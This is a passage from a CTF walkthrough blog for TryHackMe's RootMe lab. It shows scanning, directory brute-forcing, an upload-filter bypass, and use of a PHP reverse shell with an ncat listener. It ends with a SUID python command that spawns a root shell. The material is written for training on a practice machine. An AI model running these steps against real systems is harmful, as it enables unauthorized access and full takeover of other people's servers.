RootMe CTF: TryHackMe A Beginner’s Guide to Capture the flag
Run Interface for Account takeover vulnerability fraud detection
April 7, 2021
What is WAF? How Web Application Firewall Evasion Techniques Work?
April 15, 2021
In this blog, you will learn about how to hack RootMe machine from TryHackMe.
So let’s jump straight to TryHackMe and deploy the machine here is the link for the machine: https://www.tryhackme.com/room/rrootme
TASK-1: Deploy the Machine
Start the machine.
1. Deploy the machine
– No answer needed.
TASK-2: Reconnaissance
Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and impure intentions. We are doing it with pure intentions on this test machine named RootMe. So let’s perform a quick NMAP scan and find information about the target.
- In case you don’t know it is a network mapper that has emerged as one of the most popular, free network discovery tools on the market. Nmap is now one of the core tools used by network administrators to map their networks.
To scan a network you can use following command:
| nmap -A -T4 <MACHINE_IP> |
- – A: Enable OS detection, version detection, script scanning, and traceroute.
- – T4: Set timing template (higher is faster)
NMAP scan result:
- 22/tcp open ssh OpenSSH 7.6p1
- 80/tcp open http Apache httpd 2.4.29
- Service Info OS Linux
1. Scan the rootme machine, how many ports are open?
– 2
2. What version of Apache is running?
– 2.4.29
3. What service is running on port 22?
– ssh
4. Find directories on the web server using the GoBuster tool.
What is Gobuster?
- Gobuster is a tool used to brute-force: URIs (directories and files) in websites. DNS subdomains (with wildcard support). To learn more about Gobuster and installation process visit: https://github.com/OJ/gobuster
To brute-force directories you can use following command:
| gobuster dir -u <URL> -w <WORDLIST_LOCATION> |
- – u: URL of the rootme machine.
- – w: Path to wordlist.
– No answer needed.
5. What is the hidden directory?
– /panel/
TASK-3: Getting a Shell
Navigate to URL: http://<MACHINE_IP>
It’s a basic web page and nothing interesting.
Let’s check the source code of a website, sometimes you’ll end up getting sensitive endpoints, passwords, hidden paths, and secret keys inside the source code.
Here we got nothing in source code, Let’s see what’s in the hidden directory /panel/ we previously discovered using gobuster.
Navigating to URL: http://<MACHINE_IP>/panel
Here we found a file upload functionality where we can upload files.
Ah!!!! What if we can upload malicious .php files? Let’s check.
Tried .php – Denied.
Tried .phtml – Success !!!!
Wanna know how I did this? It’s called file upload restrictions bypass.
To learn in depth about this do visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
Now we can upload a php reverse shell here, we’ll use pentestmonkey php-reverse-shell.php script to obtain the reverse shell using netcat.
- In case you don’t know Netcat (also known as ‘nc’) is a networking utility used for reading or writing from TCP and UDP sockets using an easy interface. To learn more about netcat do visit: https://nmap.org/ncat/
- Here is the link for php reverse shell: https://github.com/pentestmonkey/php-reverse-shell
Download the script, remember to replace the $ip in the script with your machine ip and $port with anything, I’ll be using 1337.
- Save changes and upload the script on http://<MACHINE_IP>/panel
- Start the netcat listener on any port. I’m using port 1337.
Netcat listener can be started using following command:
| ncat -nlvp <PORT_NUMBER> |
- -n : Do not resolve hostnames via DNS
- -l : Bind and listen for incoming connections
- -v : Set verbosity level (can be used several times)
- -p : Specify source port to use
Now we’ll gain reverse shell by executing the uploaded script by visiting following url:
http://<MACHINE_IP>/uploads/php-reverse-shell.phtml
Voilla !!!!!
We have successfully gained a shell.
But the shell is not stable, let’s make this shell stable using following command:
| python3 -c “import pty;pty.spawn(‘/bin/bash’)” |
And find the user.txt file using following command:
| find / -type f -name user.txt 2>/dev/null |
- – type f : searches files only.
- – name : name of the file to locate.
- 2>/dev/null : suppresses error.
We have found user.txt file and it’s inside /var/www/
To read data inside file you can use following command:
| cat /var/www/user.txt |
1. user.txt
– THM{XXXXXXXXXXXXXXXX}
TASK-4: Privilege Escalation
To escalate privilege we need to hunt for the files with SUID permission.
- SUID is a special file permission for executable files which enables other users to run the file with effective permissions of the file owner.
and this can be achieved using following command:
| find / -type f -user root -perm -4000 2>/dev/null |
- – type f : searches files only.
- – perm : searches files with specific permission.
- 2>/dev/null : suppresses errors.
Ah!!!!!!! Here /usr/bin/python have SUID permission – Interesting.
1. Search for files with SUID permission, which file is weird?
– /usr/bin/python
2. Find a form to escalate your privileges.
– No answer needed.
Let’s escalate our privileges.
- GTFOBins got cool privilege escalation commands, can be found on:
- searching for python SUID on GTFOBins.
We got commands for privilege escalation, here we can skip the first command as the python binary already has SUID permission. Copy and paste the command in the terminal without ./ to see if it works.
| python -c ‘import os; os.execl(“/bin/sh”, “sh”, “-p”)’ |
Voilla!!!!!! It works.
We have successfully escalated our privileges.
As we are root now, Let’s hunt for the root flag.
It’s in the /root directory.
| cat /root/user.txt |
1. root.txt
– THM{XXXXXXXXXXXXXXXX}
DONE. ROOM COMPLETED!!!!!
Salud!!!!!
The RootMe CTF is aimed at beginners and I will recommend all beginners to try and root it.
